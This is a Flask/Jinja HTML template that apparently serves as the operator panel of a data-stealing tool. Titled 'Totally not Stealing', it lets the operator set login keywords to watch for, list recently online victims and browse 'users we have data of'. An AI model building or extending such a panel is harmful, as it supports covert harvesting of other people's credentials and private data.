{% extends "base.html" %}

{% block title %} Totally not Stealing {% endblock %}

{% block contents %}
<h1> Totally Innocent Things are Happening </h1>
<form action="{{ url_for('add_to_login_kw')}}" method="POST">
    <label for="kw">Login Keywords</label>
    <input type="text" name="word" id="kw" placeholder="username" required>
    <input type="submit">
</form>
<h2> Users Online (up to 3 minutes) </h2>
<ul>
    {% for usr in recent_users %}
    <li>
        <a href="/view_user/{{usr[0]}}">{{usr[0]}} at {{usr[1]}}</a>
    </li>
    {% endfor %}
</ul>
<table class="table table-sm table-striped table-bordered">
    <thead>
        <tr>
            <th scope="col">Keyword to Search</th>
            <th scope="col">Delete</th>
        </tr>
    </thead>
    <tbody>
        {% for kw in login_kws %}
        <tr>
            <td>{{kw}}</td>
            <td>
                <form action="{{ url_for('remove_login_kw', word=kw)}}" method="POST">
                    <button type="submit" class="btn btn-danger">Delete</button>
                </form>
            </td>
        </tr>
        {% endfor %}
    </tbody>
</table>
<h2> Users we have data of: </h2>
<ul>
    {% for user in users %}
    <li> <a href="/view_user/{{user}}">{{user}}</a>
    </li>
    {% endfor %}
</ul>
{% endblock %}